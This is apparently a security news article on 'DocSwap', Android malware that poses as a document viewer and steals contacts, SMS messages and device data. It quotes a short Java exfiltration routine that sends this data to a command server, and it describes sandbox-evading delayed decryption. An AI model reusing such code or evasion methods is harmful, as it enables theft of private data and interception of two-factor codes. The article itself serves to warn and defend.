A sophisticated malware campaign dubbed “DocSwap” has emerged targeting Android users globally by disguising itself as a legitimate document security and viewing application.
The malware leverages social engineering tactics to trick users into installing what appears to be a productivity tool while covertly establishing persistence on victims’ devices and exfiltrating sensitive information.
Initial infection typically occurs through phishing emails or compromised websites promoting the fake document viewer as a solution for securely opening PDF and Office files.
Upon installation, DocSwap requests extensive permissions, including access to contacts, storage, and SMS messaging capabilities.
S2W Security analysts noted that once installed, the malware establishes a connection to command-and-control servers using an encrypted protocol to bypass standard detection methods.
Their analysis revealed a significant spike in infections across Asia, Europe, and North America in the past three weeks.
The malware implements a sophisticated obfuscation technique to hide its malicious code.
When the application is opened, it actually does display document viewing capabilities while simultaneously executing its payload in the background, making detection particularly challenging for average users.
The core of DocSwap’s functionality relies on a native library that executes the following code:-
private void exfiltrateData() {
String deviceInfo = getDeviceInfo();
String contactsList = getContacts();
String smsData = getMessages();
new AsyncTask() {
@Override
protected Void doInBackground(Void... params) {
sendToC2Server(encryptData(deviceInfo + contactsList + smsData));
return null;
}
}.execute();
}
Attack Analysis
The malware utilizes a multi-stage infection process that begins with a dropper component. This initial payload appears benign but contains an encrypted payload that decrypts after a predetermined delay.
This technique helps evade sandbox analysis and dynamic scanning tools commonly used by security researchers.
Analysis of the network traffic shows that DocSwap communicates with servers primarily located in Eastern Europe and Southeast Asia, using a custom protocol that mimics legitimate HTTPS traffic.
The most concerning aspect of DocSwap is its ability to intercept and forward authentication SMS messages, potentially compromising two-factor authentication.
Security experts recommend immediate removal of any suspicious document viewing applications and running full device scans with reputable antivirus software.
Users should also enable Google Play Protect and avoid installing applications from unknown sources.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.